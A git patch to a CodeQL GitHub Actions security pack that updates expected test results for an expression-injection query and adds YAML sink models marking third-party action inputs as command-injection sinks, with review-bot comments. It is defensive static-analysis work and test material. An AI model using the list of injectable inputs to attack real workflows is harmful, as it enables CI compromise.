@@ -254,7 +254,7 @@ subpaths | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | github.event.commits[11].committer.name | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | steps.summary.outputs.value | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | steps.step.outputs.value | -| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | needs.job1.outputs.job_output | +| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | needs.job1.outputs['job_output'] | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | github.event.workflow_run.display_title | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | github.event.workflow_run.head_commit.message | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | github.event.workflow_run.head_commit.author.email | diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected index 21a9978c54f8..d22e9833f521 100644 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected 
@@ -44,10 +44,10 @@ edges | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | -| .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | +| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | 
@@ -172,12 +172,12 @@ nodes | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | -| .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | -| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | github.event.workflow_run.head_commit.message | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | 
@@ -261,7 +261,7 @@ subpaths | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | -| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | From 446a2dc2673085a24960ad3f293e67f247d59cd5 Mon Sep 17 00:00:00 2001 
From: jorgectf Date: Wed, 13 Mar 2024 23:22:13 +0100 Subject: [PATCH 096/707] Add security sinks --- ql/lib/ext/8398a7_action-slack.model.yml | 6 +++++ ql/lib/ext/actions_github-script.model.yml | 2 +- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 15 ++++++++++++ ...nnn_action-semantic-pull-request.model.yml | 6 +++++ ql/lib/ext/anchore_sbom-action.model.yml | 10 ++++++++ ql/lib/ext/anchore_scan-action.model.yml | 6 +++++ .../ext/andresz1_size-limit-action.model.yml | 9 +++++++ ql/lib/ext/asdf-vm_actions.model.yml | 6 +++++ .../axel-op_googlejavaformat-action.model.yml | 7 ++++++ ql/lib/ext/azure_powershell.model.yml | 6 +++++ ql/lib/ext/bahmutov_npm-install.model.yml | 6 +++++ .../blackducksoftware_github-action.model.yml | 8 +++++++ .../bufbuild_buf-breaking-action.model.yml | 6 +++++ ql/lib/ext/bufbuild_buf-lint-action.model.yml | 5 ++++ .../ext/bufbuild_buf-setup-action.model.yml | 7 ++++++ ql/lib/ext/cachix_cachix-action.model.yml | 6 +++++ ql/lib/ext/changesets_action.model.yml | 7 ++++++ .../ext/cloudflare_wrangler-action.model.yml | 7 ++++++ .../crazy-max_ghaction-chocolatey.model.yml | 6 +++++ .../crazy-max_ghaction-import-gpg.model.yml | 2 +- ...cycjimmy_semantic-release-action.model.yml | 8 +++++++ ql/lib/ext/cypress-io_github-action.model.yml | 6 +++++ .../ext/dailydotdev_action-devcard.model.yml | 7 ++++++ ...me_reportgenerator-github-action.model.yml | 6 +++++ .../daspn_private-actions-checkout.model.yml | 7 ++++++ .../dawidd6_action-ansible-playbook.model.yml | 7 ++++++ ...dawidd6_action-download-artifact.model.yml | 6 +++++ ql/lib/ext/delaguardo_setup-clojure.model.yml | 2 +- ...tesystems_magic-nix-cache-action.model.yml | 11 +++++++++ ...er-practice_actions-setup-docker.model.yml | 8 +++++++ ql/lib/ext/docker_build-push-action.model.yml | 6 +++++ ql/lib/ext/endbug_latest-tag.model.yml | 9 +++++++ ql/lib/ext/expo_expo-github-action.model.yml | 7 ++++++ ...seextended_action-hosting-deploy.model.yml | 6 +++++ 
ql/lib/ext/gabrielbb_xvfb-action.model.yml | 7 ++++++ ql/lib/ext/game-ci_unity-builder.model.yml | 7 ++++++ .../ext/game-ci_unity-test-runner.model.yml | 2 +- ...autamkrishnar_blog-post-workflow.model.yml | 6 +++++ .../ext/go-semantic-release_action.model.yml | 6 +++++ .../golangci_golangci-lint-action.model.yml | 6 +++++ .../ext/gonuit_heroku-docker-deploy.model.yml | 7 ++++++ .../goreleaser_goreleaser-action.model.yml | 6 +++++ ...te-or-update-pull-request-action.model.yml | 9 +++++++ ql/lib/ext/ilammy_msvc-dev-cmd.model.yml | 9 +++++++ ql/lib/ext/ilammy_setup-nasm.model.yml | 7 ++++++ ql/lib/ext/imjohnbo_issue-bot.model.yml | 8 +++++++ ql/lib/ext/iterative_setup-cml.model.yml | 6 +++++ ql/lib/ext/iterative_setup-dvc.model.yml | 6 +++++ ...sives_github-pages-deploy-action.model.yml | 11 +++++++++ .../ext/johnnymorganz_stylua-action.model.yml | 6 +++++ .../ext/jurplel_install-qt-action.model.yml | 11 +++++++++ ql/lib/ext/jwalton_gh-ecr-push.model.yml | 7 ++++++ ql/lib/ext/leafo_gh-actions-lua.model.yml | 7 ++++++ .../ext/leafo_gh-actions-luarocks.model.yml | 6 +++++ .../lucasbento_auto-close-issues.model.yml | 6 +++++ ql/lib/ext/magefile_mage-action.model.yml | 6 +++++ ql/lib/ext/maierj_fastlane-action.model.yml | 8 +++++++ .../manusa_actions-setup-minikube.model.yml | 9 +++++++ ql/lib/ext/mattdavis0351_actions.model.yml | 9 +++++++ .../ext/meteorengineer_setup-meteor.model.yml | 6 +++++ ql/lib/ext/microsoft_setup-msbuild.model.yml | 7 ++++++ ...hers-excellent_docker-build-push.model.yml | 16 +++++++++++++ ql/lib/ext/msys2_setup-msys2.model.yml | 7 ++++++ ql/lib/ext/mxschmitt_action-tmate.model.yml | 7 ++++++ ql/lib/ext/mymindstorm_setup-emsdk.model.yml | 6 +++++ .../ext/nanasess_setup-chromedriver.model.yml | 6 +++++ ql/lib/ext/nanasess_setup-php.model.yml | 6 +++++ ql/lib/ext/nick-fields_retry.model.yml | 8 +++++++ ql/lib/ext/octokit_graphql-action.model.yml | 6 +++++ ql/lib/ext/octokit_request-action.model.yml | 6 +++++ ql/lib/ext/olafurpg_setup-scala.model.yml 
| 6 +++++ .../paambaati_codeclimate-action.model.yml | 6 +++++ .../peter-evans_create-pull-request.model.yml | 6 +++++ .../ext/plasmicapp_plasmic-action.model.yml | 8 +++++++ .../preactjs_compressed-size-action.model.yml | 7 ++++++ ql/lib/ext/py-actions_flake8.model.yml | 12 ++++++++++ ...py-actions_py-dependency-install.model.yml | 6 +++++ ql/lib/ext/pyo3_maturin-action.model.yml | 9 +++++++ ...vecircus_android-emulator-runner.model.yml | 24 +++++++++++++++++++ ql/lib/ext/reggionick_s3-deploy.model.yml | 13 ++++++++++ .../ext/renovatebot_github-action.model.yml | 10 ++++++++ .../ext/roots_issue-closer-action.model.yml | 7 ++++++ ql/lib/ext/ros-tooling_setup-ros.model.yml | 6 +++++ ql/lib/ext/ruby_setup-ruby.model.yml | 5 ++++ ...ction-detect-and-tag-new-version.model.yml | 5 ++++ ...skitionek_notify-microsoft-teams.model.yml | 6 +++++ ql/lib/ext/snow-actions_eclint.model.yml | 6 +++++ .../ext/stackhawk_hawkscan-action.model.yml | 10 ++++++++ .../ext/step-security_harden-runner.model.yml | 6 +++++ ql/lib/ext/tibdex_backport.model.yml | 9 +++++++ ql/lib/ext/tj-actions_changed-files.model.yml | 2 +- ...ss_conventional-changelog-action.model.yml | 15 ++++++++++++ .../tryghost_action-deploy-theme.model.yml | 7 ++++++ ql/lib/ext/veracode_veracode-sca.model.yml | 9 +++++++ .../ext/wearerequired_lint-action.model.yml | 8 +++++++ ql/lib/ext/webfactory_ssh-agent.model.yml | 8 +++++++ ql/lib/ext/zaproxy_action-baseline.model.yml | 9 +++++++ ql/lib/ext/zaproxy_action-full-scan.model.yml | 9 +++++++ .../Security/CWE-094/ExpressionInjection.ql | 3 ++- 99 files changed, 719 insertions(+), 6 deletions(-) create mode 100644 ql/lib/ext/8398a7_action-slack.model.yml create mode 100644 ql/lib/ext/amannn_action-semantic-pull-request.model.yml create mode 100644 ql/lib/ext/anchore_sbom-action.model.yml create mode 100644 ql/lib/ext/anchore_scan-action.model.yml create mode 100644 ql/lib/ext/andresz1_size-limit-action.model.yml create mode 100644 ql/lib/ext/asdf-vm_actions.model.yml 
create mode 100644 ql/lib/ext/axel-op_googlejavaformat-action.model.yml create mode 100644 ql/lib/ext/azure_powershell.model.yml create mode 100644 ql/lib/ext/bahmutov_npm-install.model.yml create mode 100644 ql/lib/ext/blackducksoftware_github-action.model.yml create mode 100644 ql/lib/ext/bufbuild_buf-setup-action.model.yml create mode 100644 ql/lib/ext/changesets_action.model.yml create mode 100644 ql/lib/ext/cloudflare_wrangler-action.model.yml create mode 100644 ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml create mode 100644 ql/lib/ext/cycjimmy_semantic-release-action.model.yml create mode 100644 ql/lib/ext/cypress-io_github-action.model.yml create mode 100644 ql/lib/ext/dailydotdev_action-devcard.model.yml create mode 100644 ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml create mode 100644 ql/lib/ext/daspn_private-actions-checkout.model.yml create mode 100644 ql/lib/ext/dawidd6_action-ansible-playbook.model.yml create mode 100644 ql/lib/ext/dawidd6_action-download-artifact.model.yml create mode 100644 ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml create mode 100644 ql/lib/ext/docker-practice_actions-setup-docker.model.yml create mode 100644 ql/lib/ext/docker_build-push-action.model.yml create mode 100644 ql/lib/ext/endbug_latest-tag.model.yml create mode 100644 ql/lib/ext/expo_expo-github-action.model.yml create mode 100644 ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml create mode 100644 ql/lib/ext/gabrielbb_xvfb-action.model.yml create mode 100644 ql/lib/ext/game-ci_unity-builder.model.yml create mode 100644 ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml create mode 100644 ql/lib/ext/go-semantic-release_action.model.yml create mode 100644 ql/lib/ext/golangci_golangci-lint-action.model.yml create mode 100644 ql/lib/ext/gonuit_heroku-docker-deploy.model.yml create mode 100644 ql/lib/ext/goreleaser_goreleaser-action.model.yml create mode 100644 
ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml create mode 100644 ql/lib/ext/ilammy_msvc-dev-cmd.model.yml create mode 100644 ql/lib/ext/ilammy_setup-nasm.model.yml create mode 100644 ql/lib/ext/imjohnbo_issue-bot.model.yml create mode 100644 ql/lib/ext/iterative_setup-cml.model.yml create mode 100644 ql/lib/ext/iterative_setup-dvc.model.yml create mode 100644 ql/lib/ext/jamesives_github-pages-deploy-action.model.yml create mode 100644 ql/lib/ext/johnnymorganz_stylua-action.model.yml create mode 100644 ql/lib/ext/jurplel_install-qt-action.model.yml create mode 100644 ql/lib/ext/leafo_gh-actions-lua.model.yml create mode 100644 ql/lib/ext/leafo_gh-actions-luarocks.model.yml create mode 100644 ql/lib/ext/lucasbento_auto-close-issues.model.yml create mode 100644 ql/lib/ext/magefile_mage-action.model.yml create mode 100644 ql/lib/ext/maierj_fastlane-action.model.yml create mode 100644 ql/lib/ext/manusa_actions-setup-minikube.model.yml create mode 100644 ql/lib/ext/meteorengineer_setup-meteor.model.yml create mode 100644 ql/lib/ext/microsoft_setup-msbuild.model.yml create mode 100644 ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml create mode 100644 ql/lib/ext/msys2_setup-msys2.model.yml create mode 100644 ql/lib/ext/mxschmitt_action-tmate.model.yml create mode 100644 ql/lib/ext/nanasess_setup-chromedriver.model.yml create mode 100644 ql/lib/ext/nanasess_setup-php.model.yml create mode 100644 ql/lib/ext/nick-fields_retry.model.yml create mode 100644 ql/lib/ext/octokit_graphql-action.model.yml create mode 100644 ql/lib/ext/octokit_request-action.model.yml create mode 100644 ql/lib/ext/olafurpg_setup-scala.model.yml create mode 100644 ql/lib/ext/paambaati_codeclimate-action.model.yml create mode 100644 ql/lib/ext/peter-evans_create-pull-request.model.yml create mode 100644 ql/lib/ext/plasmicapp_plasmic-action.model.yml create mode 100644 ql/lib/ext/preactjs_compressed-size-action.model.yml create mode 100644 
ql/lib/ext/py-actions_flake8.model.yml create mode 100644 ql/lib/ext/py-actions_py-dependency-install.model.yml create mode 100644 ql/lib/ext/pyo3_maturin-action.model.yml create mode 100644 ql/lib/ext/reactivecircus_android-emulator-runner.model.yml create mode 100644 ql/lib/ext/reggionick_s3-deploy.model.yml create mode 100644 ql/lib/ext/renovatebot_github-action.model.yml create mode 100644 ql/lib/ext/roots_issue-closer-action.model.yml create mode 100644 ql/lib/ext/ros-tooling_setup-ros.model.yml create mode 100644 ql/lib/ext/skitionek_notify-microsoft-teams.model.yml create mode 100644 ql/lib/ext/snow-actions_eclint.model.yml create mode 100644 ql/lib/ext/stackhawk_hawkscan-action.model.yml create mode 100644 ql/lib/ext/step-security_harden-runner.model.yml create mode 100644 ql/lib/ext/tibdex_backport.model.yml create mode 100644 ql/lib/ext/tripss_conventional-changelog-action.model.yml create mode 100644 ql/lib/ext/tryghost_action-deploy-theme.model.yml create mode 100644 ql/lib/ext/veracode_veracode-sca.model.yml create mode 100644 ql/lib/ext/wearerequired_lint-action.model.yml create mode 100644 ql/lib/ext/webfactory_ssh-agent.model.yml create mode 100644 ql/lib/ext/zaproxy_action-baseline.model.yml create mode 100644 ql/lib/ext/zaproxy_action-full-scan.model.yml
diff --git a/ql/lib/ext/8398a7_action-slack.model.yml b/ql/lib/ext/8398a7_action-slack.model.yml
new file mode 100644
index 000000000000..e3d97adf69d4
--- /dev/null
+++ b/ql/lib/ext/8398a7_action-slack.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/actions_github-script.model.yml
index 2ed2e03a34e7..cd409f38b59d 100644
--- a/ql/lib/ext/actions_github-script.model.yml
+++ b/ql/lib/ext/actions_github-script.model.yml
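Review bot: The new 8398a7_action-slack.model.yml ends without a trailing newline (`\ No newline at end of file`), and the same is true of the other new files asdf-vm_actions, cachix_cachix-action, determinatesystems_magic-nix-cache-action, docker_build-push-action, gabrielbb_xvfb-action, gautamkrishnar_blog-post-workflow, gr2m_create-or-update-pull-request-action, ilammy_msvc-dev-cmd and imjohnbo_issue-bot. The crazy-max_ghaction-import-gpg, delaguardo_setup-clojure and game-ci_unity-test-runner hunks go the other way and strip an existing final newline from an otherwise unchanged row, so those three hunks are whitespace-only churn. Ending every model file with a newline keeps later diffs limited to the rows that actually change.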
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["actions/github-script","*","input.script","expression-injection"]
+ - ["actions/github-script", "*", "input.script", "code-injection"]
diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml
index f370a9fe2228..ad65775e58d1 100644
--- a/ql/lib/ext/akhileshns_heroku-deploy.model.yml
+++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml
@@ -4,3 +4,18 @@ extensions:
 extensible: summaryModel
 data:
 - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection"]
+ - ["akhileshns/heroku-deploy", "*", "input.buildpack", "command-injection"]
+ - ["akhileshns/heroku-deploy", "*", "input.region", "command-injection"]
+ - ["akhileshns/heroku-deploy", "*", "input.stack", "command-injection"]
+ - ["akhileshns/heroku-deploy", "*", "input.team", "command-injection"]
+ - ["akhileshns/heroku-deploy", "*", "input.docker_heroku_process_type", "command-injection"]
+ - ["akhileshns/heroku-deploy", "*", "input.docker_build_args", "command-injection"]
+ - ["akhileshns/heroku-deploy", "*", "input.branch", "command-injection"]
+ - ["akhileshns/heroku-deploy", "*", "input.appdir", "command-injection"]
+ - ["akhileshns/heroku-deploy", "*", "input.heroku_api_key", "command-injection"]
+ - ["akhileshns/heroku-deploy", "*", "input.heroku_email", "command-injection"]
diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml
new file mode 100644
index 000000000000..c530a3af9b3c
--- /dev/null
+++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml
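Review bot: Renaming the sink kind on the actions/github-script row from `expression-injection` to `code-injection` silently retires the old kind; any model file outside this commit that still carries `expression-injection` will stop matching once the consuming query reads only the new kind, and nothing here checks for that. The diffstat shows Security/CWE-094/ExpressionInjection.ql changing by three lines, which I take to be the consumer side of this rename, but that hunk is not in view. A quick grep of ql/lib/ext for the old kind string before merging, or a short note in the commit description that the kind was renamed, would make the migration auditable.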
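Review bot: Nothing in the new akhileshns/heroku-deploy sinkModel block records why each of its eleven inputs is a command-injection sink, and two of them (`input.heroku_api_key`, `input.heroku_email`) read as credentials rather than command fragments, so a later maintainer cannot tell whether every row was verified against the action's own scripts. A one-line YAML comment above the block, e.g. `# all inputs below are interpolated into a shell command in <ACTION_SCRIPT_PATH>; re-verify when the action changes`, would make each row checkable and give a reason to prune rows when an input stops reaching the shell. The same remark applies to the other sinkModel files added in this commit.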
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sourceModel
+ data:
+ - ["amannn/action-semantic-pull-request", "*", "output.error_message", "pull_request_target", "PR title"]
diff --git a/ql/lib/ext/anchore_sbom-action.model.yml b/ql/lib/ext/anchore_sbom-action.model.yml
new file mode 100644
index 000000000000..c632a3a1ff25
--- /dev/null
+++ b/ql/lib/ext/anchore_sbom-action.model.yml
@@ -0,0 +1,10 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["anchore/sbom-action", "*", "input.syft-version", "command-injection"]
+ - ["anchore/sbom-action", "*", "input.format", "command-injection"]
+ - ["anchore/sbom-action", "*", "input.path", "command-injection"]
+ - ["anchore/sbom-action", "*", "input.file", "command-injection"]
+ - ["anchore/sbom-action", "*", "input.image", "command-injection"]
diff --git a/ql/lib/ext/anchore_scan-action.model.yml b/ql/lib/ext/anchore_scan-action.model.yml
new file mode 100644
index 000000000000..26e5adea505b
--- /dev/null
+++ b/ql/lib/ext/anchore_scan-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["anchore/scan-action", "*", "input.grype-version", "command-injection"]
diff --git a/ql/lib/ext/andresz1_size-limit-action.model.yml b/ql/lib/ext/andresz1_size-limit-action.model.yml
new file mode 100644
index 000000000000..2903888a7318
--- /dev/null
+++ b/ql/lib/ext/andresz1_size-limit-action.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection"]
+ - ["andresz1/size-limit-action", "*", "input.build_script", "command-injection"]
+ - ["andresz1/size-limit-action", "*", "input.script", "command-injection"]
+ - ["andresz1/size-limit-action", "*", "input.clean_script", "command-injection"]
diff --git a/ql/lib/ext/asdf-vm_actions.model.yml b/ql/lib/ext/asdf-vm_actions.model.yml
new file mode 100644
index 000000000000..21dcd22c8b7f
--- /dev/null
+++ b/ql/lib/ext/asdf-vm_actions.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["asdf-vm/actions", "*", "input.before_install", "command-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml
new file mode 100644
index 000000000000..236eade34a64
--- /dev/null
+++ b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection"]
+ - ["axel-op/googlejavaformat-action", "*", "input.commit-message", "command-injection"]
diff --git a/ql/lib/ext/azure_powershell.model.yml b/ql/lib/ext/azure_powershell.model.yml
new file mode 100644
index 000000000000..c0e11c8201f4
--- /dev/null
+++ b/ql/lib/ext/azure_powershell.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["azure/powershell", "*", "input.azPSVersion", "command-injection"]
diff --git a/ql/lib/ext/bahmutov_npm-install.model.yml b/ql/lib/ext/bahmutov_npm-install.model.yml
new file mode 100644
index 000000000000..2841f406bdaa
--- /dev/null
+++ b/ql/lib/ext/bahmutov_npm-install.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["bahmutov/npm-install", "*", "input.install-command", "command-injection"]
diff --git a/ql/lib/ext/blackducksoftware_github-action.model.yml b/ql/lib/ext/blackducksoftware_github-action.model.yml
new file mode 100644
index 000000000000..aa060de610d9
--- /dev/null
+++ b/ql/lib/ext/blackducksoftware_github-action.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
